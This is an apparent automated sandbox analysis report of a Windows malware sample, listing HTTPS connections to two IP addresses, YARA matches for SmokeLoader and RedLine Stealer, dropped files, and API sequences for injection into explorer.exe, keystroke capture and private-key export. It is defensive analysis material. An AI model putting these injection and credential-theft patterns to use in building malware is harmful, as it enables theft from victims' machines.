Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49763 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7144, type: MEMORYSTR
Source: Yara match	File source: 7.2.4470.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.4470.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.fihcrfb.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.6c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.4470.exe.2170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2301467371.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2015538177.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 16_2_00AD162B GetKeyboardState,ToUnicode,

16_2_00AD162B

Source: C:\Users\user\AppData\Local\Temp\354F.exe

Code function: 9_2_00007FF780B63220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,

9_2_00007FF780B63220

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2067784518.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2357152102.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.1809320353.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2067712558.00000000006CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2358138037.000000000070D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.1809489759.000000000063E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Abnormal high CPU Usage

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00401514 EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00403247 NtTerminateProcess,RtlInitUnicodeString,	0_2_00403247
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_0040324F NtTerminateProcess,RtlInitUnicodeString,	0_2_0040324F
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00403256 NtTerminateProcess,RtlInitUnicodeString,	0_2_00403256
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_0040326C NtTerminateProcess,RtlInitUnicodeString,	0_2_0040326C
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00403277 NtTerminateProcess,RtlInitUnicodeString,	0_2_00403277
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_0040327D NtTerminateProcess,RtlInitUnicodeString,	0_2_0040327D
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00403290 NtTerminateProcess,RtlInitUnicodeString,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00401514 EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401514
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	4_2_00402F97
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401542
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00403247 NtTerminateProcess,RtlInitUnicodeString,	4_2_00403247
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401549
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_0040324F NtTerminateProcess,RtlInitUnicodeString,	4_2_0040324F
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00403256 NtTerminateProcess,RtlInitUnicodeString,	4_2_00403256
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401557
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_0040326C NtTerminateProcess,RtlInitUnicodeString,	4_2_0040326C
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00403277 NtTerminateProcess,RtlInitUnicodeString,	4_2_00403277
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_0040327D NtTerminateProcess,RtlInitUnicodeString,	4_2_0040327D
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_004032C7 ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,	4_2_004032C7
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004014FE
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00403290 NtTerminateProcess,RtlInitUnicodeString,	4_2_00403290
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_00403043 RtlCreateUserThread,NtTerminateProcess,	7_2_00403043
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004014C4
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_00401508 NtAllocateVirtualMemory,	7_2_00401508
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014CF NtAllocateVirtualMemory,	7_2_004014CF
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015D5
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014DE NtAllocateVirtualMemory,	7_2_004014DE
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015DF
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015E6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015F2
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014F5 NtAllocateVirtualMemory,	7_2_004014F5
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014F8 NtAllocateVirtualMemory,	7_2_004014F8
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014FB NtAllocateVirtualMemory,	7_2_004014FB
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_00403043 RtlCreateUserThread,NtTerminateProcess,	8_2_00403043
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004014C4
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_00401508 NtAllocateVirtualMemory,	8_2_00401508
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014CF NtAllocateVirtualMemory,	8_2_004014CF
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015D5
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014DE NtAllocateVirtualMemory,	8_2_004014DE
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015DF
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015E6
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015F2
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014F5 NtAllocateVirtualMemory,	8_2_004014F5
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014F8 NtAllocateVirtualMemory,	8_2_004014F8
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014FB NtAllocateVirtualMemory,	8_2_004014FB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C34B92 RtlMoveMemory,NtUnmapViewOfSection,	11_2_00C34B92
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C333C3 NtQueryInformationFile,	11_2_00C333C3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C3349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,	11_2_00C3349B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C3342B NtQueryObject,NtQueryObject,RtlMoveMemory,	11_2_00C3342B
Source: C:\Windows\explorer.exe	Code function: 13_2_00D338B0 NtUnmapViewOfSection,	13_2_00D338B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C21016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	14_2_00C21016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C21A80 NtCreateSection,NtMapViewOfSection,	14_2_00C21A80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C21819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	14_2_00C21819
Source: C:\Windows\explorer.exe	Code function: 15_2_0035355C NtUnmapViewOfSection,	15_2_0035355C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_00AD1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	16_2_00AD1016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_00AD1B26 NtCreateSection,NtMapViewOfSection,	16_2_00AD1B26
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_00AD18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	16_2_00AD18BF
Source: C:\Windows\explorer.exe	Code function: 17_2_00E0370C NtUnmapViewOfSection,	17_2_00E0370C

Detected potential crypto function

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00418C80	0_2_00418C80
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00418C80	4_2_00418C80
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004189C0	7_2_004189C0
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004189C0	8_2_004189C0
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B69AC8	9_2_00007FF780B69AC8
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6DC08	9_2_00007FF780B6DC08
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6A774	9_2_00007FF780B6A774
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6A51C	9_2_00007FF780B6A51C
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6213C	9_2_00007FF780B6213C
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6B424	9_2_00007FF780B6B424
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B63220	9_2_00007FF780B63220
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_3_05DCCCF1	11_3_05DCCCF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_3_05DCCCF1	11_3_05DCCCF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_3_05DCCCF1	11_3_05DCCCF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_3_05DCCCF1	11_3_05DCCCF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C32198	11_2_00C32198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C3C2F9	11_2_00C3C2F9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C4B35C	11_2_00C4B35C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C84438	11_2_00C84438
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C4B97E	11_2_00C4B97E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C36E6A	11_2_00C36E6A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C55F08	11_2_00C55F08
Source: C:\Windows\explorer.exe	Code function: 13_2_00D31E20	13_2_00D31E20
Source: C:\Windows\explorer.exe	Code function: 15_2_00352860	15_2_00352860
Source: C:\Windows\explorer.exe	Code function: 15_2_00352054	15_2_00352054
Source: C:\Windows\explorer.exe	Code function: 17_2_00E020F4	17_2_00E020F4
Source: C:\Windows\explorer.exe	Code function: 17_2_00E02A04	17_2_00E02A04
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00406E80	33_2_00406E80
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00418C80	33_2_00418C80
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_004084AD	33_2_004084AD
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_004040B4	33_2_004040B4
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00401D5E	33_2_00401D5E
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_004073C4	33_2_004073C4
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_004097A1	33_2_004097A1
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_00406E80	34_2_00406E80
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004084AD	34_2_004084AD
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004040B4	34_2_004040B4
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_00401D5E	34_2_00401D5E
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004189C0	34_2_004189C0
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004073C4	34_2_004073C4
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004097A1	34_2_004097A1

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 00C38801 appears 40 times
Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 00C37F70 appears 32 times

Uses 32bit PE files

Source: OCYe9qcxiM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000007.00000002.2067784518.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2357152102.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
